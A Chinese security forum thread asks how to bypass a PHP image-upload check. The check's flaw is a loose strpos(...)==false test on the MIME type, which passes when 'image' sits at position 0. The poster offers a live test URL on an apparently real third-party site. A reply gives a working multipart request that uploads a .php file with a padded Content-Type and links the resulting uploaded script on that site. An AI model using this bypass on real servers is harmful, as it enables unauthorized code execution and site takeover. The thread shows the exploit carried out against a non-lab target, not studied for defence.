首页
社区
课程
招聘
未解决 关于php上传漏洞问题请教
发表于: 2021-1-16 06:49 1885

未解决 关于php上传漏洞问题请教

2021-1-16 06:49
1885
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
 
 
 if(empty($_FILES['file']))
   {
       echo json_encode(['isSuccess'=>false,'msg'=>'请上传二维码']);exit;
   }
 
   $file = $_FILES["file"];
 
   if ($file["error"] > 0)
   {
       echo json_encode(['isSuccess'=>false,'msg'=>'上传图片信息错误']);exit;
 
   }
 
   if(strpos($file["type"],'image') == false)
   {
       echo json_encode(['isSuccess'=>false,'msg'=>'请上传图片']);exit;
   }
 
   $temp = explode(".", $file["name"]);
   $extension = end($temp);
 
 
   $new_path = 'upload/'.time().rand(1000,9999).'.'.$extension;
 
   if(move_uploaded_file($file["tmp_name"], $new_path))
   {
       echo json_encode(['isSuccess'=>true,'msg'=>'上传成功','file'=>$new_path]);
   }
   else
   {
       echo json_encode(['isSuccess'=>false,'msg'=>'上传失败']);exit;
   }

if(strpos($file["type"],'image') == false)
这是判断image字符串在$file['type']中第一次出现的位置
我这个php版本是0 然后0==false是成立的
可就是传不上去,我朋友非说能传上去。
http://ag.1nj6xv.id/agent@991688/tx_upload.php 这是测试地址
burp改包测试不行,有老哥能突破吗


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (5)
雪    币: 3496
活跃值: (749)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
https://blog.csdn.net/u012161726/article/details/78038706?utm_medium=distribute.pc_relevant.none-task-blog-baidujs_title-6&spm=1001.2101.3001.4242

这个吗?
没有前端,没法测试
2021-1-16 09:05
0
雪    币: 2040
活跃值: (4950)
能力值: ( LV13,RANK:278 )
在线值:
发帖
回帖
粉丝
3
http://ag.1nj6xv.id/agent@991688/upload/16107618092737.php

---------------------------acebdf13572468
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: 这里随便填充一个及以上不为空的数据防止代码中strpos返回0image/jpeg

<?php phpinfo();?>
---------------------------acebdf13572468--
2021-1-16 09:55
0
雪    币: 73
活跃值: (281)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
多谢多谢
2021-1-16 14:34
0
雪    币: 73
活跃值: (281)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
零加一 http://ag.1nj6xv.id/agent@991688/upload/16107618092737.php ---------------------------acebdf13572 ...
多谢老哥,明白了
2021-1-16 14:35
0
雪    币: 73
活跃值: (281)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
kxzpy https://blog.csdn.net/u012161726/article/details/78038706?utm_medium=distribute.pc_relevant.none-tas ...
多谢老哥
2021-1-16 14:35
0
游客
登录 | 注册 方可回帖
返回
//